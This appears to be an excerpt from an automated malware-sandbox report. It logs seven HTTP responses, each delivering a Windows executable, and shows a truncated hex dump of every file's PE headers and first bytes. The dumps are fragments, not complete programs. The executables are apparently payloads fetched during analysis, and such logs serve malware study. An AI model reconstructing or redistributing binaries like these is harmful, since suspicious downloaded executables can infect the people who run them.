Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:31 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Mon, 23 Sep 2024 14:42:37 GMTConnection: keep-aliveETag: "66f17e5d-58000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 04 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b1 29 00 00 00 c0 04 00 00 2a 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 f0 00 00 00 f0 04 00 00 5e 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 48 00 00 00 f0 05 00 00 4a 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:34 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Sun, 22 Sep 2024 20:59:29 GMTConnection: keep-aliveETag: "66f08531-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:37 GMTContent-Type: application/octet-streamContent-Length: 986112Last-Modified: Tue, 24 Sep 2024 18:05:31 GMTConnection: keep-aliveETag: "66f2ff6b-f0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 27 31 f2 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 02 0f 00 00 08 00 00 00 00 00 00 82 21 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 21 0f 00 57 00 00 00 00 40 0f 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 01 0f 00 00 20 00 00 00 02 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 05 00 00 00 40 0f 00 00 06 00 00 00 04 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0f 00 00 02 00 00 00 0a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 21 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 50 d9 0e 00 d8 47 00 00 03 00 00 00 e7 00 00 06 94 55 00 00 bc 83 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 28 d4 00 00 06 2a 00 00 00 3e 03 02 28 18 00 00 0a 04 6f 56 00 00 06 26 2a 2e 73 0c 00 00 06 80 01 00 00 04 2a 1b 30 04 00 88 01 00 00 01 00 00 11 28 19 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 33 07 28 07 00 00 06 2d 03 16 6a 2a 7e 01 00 00 04 25 13 0b 28 1c 00 00 0a 7e 01 00 00 04 6f 0d 00 00 06 0c 08 16 6a 40 38 01 00 00 28 1d 00 00 0a 13 08 73 1e 00 00 0a 0b 11 08 6f 1f 00 00 0a 13 07 de 11 26 11 08 6f 20 00 00 0a 73 21 00 00 0a 13 07 de 00 11 07 6f 22 00 00 0a 0d 09 2c 07 09 8e 69 2d 02 14 0d 09 2c 07 07 09 6f 23 00 00 0a 07 28 24 00 00 0a 11 07 6f 25 00 00 0a 6f 26 00 00 0a 6f 23 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 28 09 00 00 06 13 05 28 19 00 00 06 13 06 07 11 05 1e 63 d2 6f 27 00 00 0a 07 11 06 d2 6f 27 00 00 0a 07 11 05 1f 18 63 d2 6f 27 00 00 0a 07 11 06 1e 63 d2 6f 27 00 00 0a 07 11 05 d2 6f 27 00 00 0a 07 11 06 1f 18 63 d2 6f 27 00 00 0a 07 11 05 1f 10 63 d2 6f 27 00 00 0a 07 11 06 1f 10 63 d2 6f 2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:40 GMTContent-Type: application/octet-streamContent-Length: 367616Last-Modified: Wed, 25 Sep 2024 17:02:23 GMTConnection: keep-aliveETag: "66f4421f-59c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b1 ea f3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 3e b1 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 b0 05 00 53 00 00 00 00 c0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 b0 af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 91 05 00 00 20 00 00 00 92 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 05 00 00 06 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 9e 05 00 e8 10 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 84 c5 64 0e 83 9a 4b be 0c f9 53 6b 0c ce 2b 47 ae 7f bf ee 51 8c ae fa 11 9d 1d 88 f7 af 95 1b ca 86 4a 19 6e 6a a4 49 d5 6b ad cb 29 f0 cd 45 26 45 89 38 5f de 62 b0 a3 de 24 10 17 b4 8c ff 09 ec d9 ee df 28 23 3f 6f 38 d0 0a c1 b5 0f 62 9d 39 b0 01 06 e9 7e 56 b5 34 83 99 76 31 d7 75 54 e1 30 da 86 1c 16 1d 5e 2e a0 d3 4c 62 81 a6 cb 0c 87 a8 c0 f8 3b d5 83 8f 0e 35 05 48 19 02 5e 84 31 8f 7c 3c c5 96 a5 60 79 35 34 a7 12 f2 66 e5 7e 0e ef 59 2c cc 53 2c 11 d1 57 70 f2 53 5b 36 83 86 dd 9c 9b 4e 6b fc 45 1e 08 5e d9 12 10 69 26 f8 a3 a4 bf fe 8d f7 10 3f 6f 6e 04 0a 8a 9f 7e 21 10 36 41 bb 01 d2 41 0e c5 96 ef 1d 4a 94 e4 8e 6e db d0 b3 78 0e 54 12 48 ea 61 92 d0 f0 9e b1 c9 ea d2 7a cc 17 08 63 d3 57 d3 85 1b 90 6e a2 67 23 75 a1 3e a3 41 91 da e7 84 36 4b 99 71 63 52 df 39 84 4c 89 da 3b 11 7a d2 73 3c eb ba df a1 92 6a f4 7c 1d 0e 9a 8c 92 0a bd 49 3a b2 77 e0 17 48 24 ed cc f3 90 7a 0f 5d 4d 48 8d 03 43 68 44 8f 79 d2 99 3e e
